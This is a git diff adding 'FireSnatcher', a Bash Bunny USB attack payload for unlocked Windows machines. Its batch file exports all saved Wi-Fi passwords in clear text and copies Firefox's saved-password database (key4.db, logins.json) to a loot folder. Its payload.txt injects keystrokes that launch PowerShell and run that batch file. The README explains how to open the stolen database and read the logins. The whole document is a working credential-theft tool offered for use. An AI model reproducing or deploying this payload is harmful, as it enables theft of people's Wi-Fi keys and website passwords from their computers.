.../credentials/FireSnatcher/payload.txt | 78 +++++++++++++++++++ 3 files changed, 129 insertions(+) create mode 100644 payloads/library/credentials/FireSnatcher/FireSnatcher.bat create mode 100644 payloads/library/credentials/FireSnatcher/README.md create mode 100644 payloads/library/credentials/FireSnatcher/payload.txt diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat new file mode 100644 index 00000000..d08c8229 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat @@ -0,0 +1,6 @@ +mkdir %~dp0\loot\%COMPUTERNAME% +cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear +C: cd \D %appdata%\mozilla\firefox\profiles\ +cd %appdata%\mozilla\firefox\profiles\*.default-release\ +copy key4.db %~dp0\loot\%COMPUTERNAME% +copy logins.json %~dp0\loot\%COMPUTERNAME% \ No newline at end of file diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md new file mode 100644 index 00000000..1d3b0dd0 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/README.md @@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt @@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now +